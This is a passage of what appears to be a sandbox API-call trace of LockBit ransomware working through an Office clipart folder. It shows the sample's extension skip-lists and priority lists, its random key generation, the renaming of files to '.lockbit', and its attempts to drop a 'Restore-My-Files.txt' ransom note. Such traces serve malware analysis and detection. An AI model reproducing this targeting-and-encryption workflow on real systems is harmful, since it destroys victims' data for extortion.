[0175.158] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.158] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.158] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.158] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.158] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.158] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.159] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.159] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.159] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.159] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.159] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.159] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.159] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.159] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.159] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.159] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.159] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.159] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.159] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.159] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.159] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.159] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.159] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.159] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.159] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.159] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.159] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00333_.WMF.lockbit") returned 72 [0175.159] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00333_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00333_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0175.161] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.161] malloc (_Size=0x40068) returned 0x1ff1e60 [0175.161] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=61002) returned 1 [0175.161] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.161] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.162] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0175.162] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.162] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.162] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0175.162] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0175.173] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00333_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00333_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.173] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.174] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0175.174] free (_Block=0x1fa2ed8) [0175.174] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00333_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.174] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.174] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.175] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0e04300, ftCreationTime.dwHighDateTime=0x1bd4ae9, ftLastAccessTime.dwLowDateTime=0x6d30c390, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc0e04300, ftLastWriteTime.dwHighDateTime=0x1bd4ae9, nFileSizeHigh=0x0, nFileSizeLow=0x8b96, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00345_.WMF", cAlternateFileName="")) returned 1 [0175.175] lstrcmpiW (lpString1=".", lpString2="SO00345_.WMF") returned -1 [0175.175] lstrcmpiW (lpString1="..", lpString2="SO00345_.WMF") returned -1 [0175.175] PathFindExtensionW (pszPath="SO00345_.WMF") returned=".WMF" [0175.175] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.175] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.175] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.175] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.175] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.175] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.175] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.175] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.175] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.175] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.175] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.175] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.175] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.175] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.175] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.175] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.175] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.176] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.176] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.176] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.176] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.176] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.176] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.176] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.176] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.176] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.176] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.176] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.176] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.176] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.176] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.176] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.176] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.176] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.176] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.176] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.176] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.176] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.176] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.176] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.176] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.177] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.177] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.177] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.177] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.177] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.177] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.177] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00345_.WMF") returned -1 [0175.177] lstrcmpiW (lpString1="ntldr", lpString2="SO00345_.WMF") returned -1 [0175.177] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00345_.WMF") returned -1 [0175.177] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00345_.WMF") returned -1 [0175.177] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00345_.WMF") returned -1 [0175.177] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00345_.WMF") returned 1 [0175.177] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00345_.WMF") returned -1 [0175.177] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.177] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00345_.WMF") returned=".WMF" [0175.177] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.177] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.177] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.177] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.177] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.177] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.177] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.177] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.178] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.178] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.178] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.178] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.178] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.178] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.178] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.178] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.178] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.178] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.178] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.178] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.178] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.178] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.178] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.178] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.178] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.178] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.178] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.178] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.178] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00345_.WMF.lockbit") returned 72 [0175.179] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00345_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00345_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0175.180] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.180] malloc (_Size=0x40068) returned 0x3df0008 [0175.180] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=35734) returned 1 [0175.180] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.181] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.181] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0175.181] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.181] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.181] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0175.181] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0175.183] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00345_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00345_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.183] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.183] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.185] free (_Block=0x1fa2ed8) [0175.185] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00345_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.185] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.185] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.185] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbb844700, ftCreationTime.dwHighDateTime=0x1bf323f, ftLastAccessTime.dwLowDateTime=0x5aa18b10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbb844700, ftLastWriteTime.dwHighDateTime=0x1bf323f, nFileSizeHigh=0x0, nFileSizeLow=0xbbe0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00350_.WMF", cAlternateFileName="")) returned 1 [0175.185] lstrcmpiW (lpString1=".", lpString2="SO00350_.WMF") returned -1 [0175.185] lstrcmpiW (lpString1="..", lpString2="SO00350_.WMF") returned -1 [0175.185] PathFindExtensionW (pszPath="SO00350_.WMF") returned=".WMF" [0175.185] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.186] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.186] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.186] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.186] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.186] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.186] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.186] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.186] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.186] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.186] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.186] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.186] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.186] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.186] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.186] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.186] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.186] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.186] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.186] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.186] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.186] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.186] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.187] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.187] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.187] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.187] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.187] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.187] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.187] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.187] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.187] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.187] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.187] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.187] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.187] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.187] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.187] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.187] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.187] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.187] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.187] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.187] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.187] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.187] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.187] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.187] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.188] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00350_.WMF") returned -1 [0175.188] lstrcmpiW (lpString1="ntldr", lpString2="SO00350_.WMF") returned -1 [0175.188] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00350_.WMF") returned -1 [0175.188] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00350_.WMF") returned -1 [0175.188] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00350_.WMF") returned -1 [0175.188] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00350_.WMF") returned 1 [0175.188] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00350_.WMF") returned -1 [0175.188] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.188] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00350_.WMF") returned=".WMF" [0175.188] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.188] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.188] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.188] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.188] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.188] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.188] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.188] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.188] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.188] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.188] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.188] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.188] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.188] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.189] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.189] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.189] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.189] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.189] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.189] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.189] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.189] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.189] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.189] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.189] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.189] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.189] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.189] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.189] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00350_.WMF.lockbit") returned 72 [0175.189] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00350_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00350_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0175.190] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.190] malloc (_Size=0x40068) returned 0x1ff1e60 [0175.191] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=48096) returned 1 [0175.191] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.191] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.191] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0175.191] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.192] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.192] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0175.192] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.194] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00350_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00350_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.194] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.194] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.195] free (_Block=0x1fa2ed8) [0175.195] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00350_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.195] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.195] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.196] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbb844700, ftCreationTime.dwHighDateTime=0x1bf323f, ftLastAccessTime.dwLowDateTime=0x6d30c390, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbb844700, ftLastWriteTime.dwHighDateTime=0x1bf323f, nFileSizeHigh=0x0, nFileSizeLow=0x934c, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00352_.WMF", cAlternateFileName="")) returned 1 [0175.196] lstrcmpiW (lpString1=".", lpString2="SO00352_.WMF") returned -1 [0175.196] lstrcmpiW (lpString1="..", lpString2="SO00352_.WMF") returned -1 [0175.196] PathFindExtensionW (pszPath="SO00352_.WMF") returned=".WMF" [0175.196] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.196] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.196] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.196] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.196] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.196] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.196] lstrcmpiW 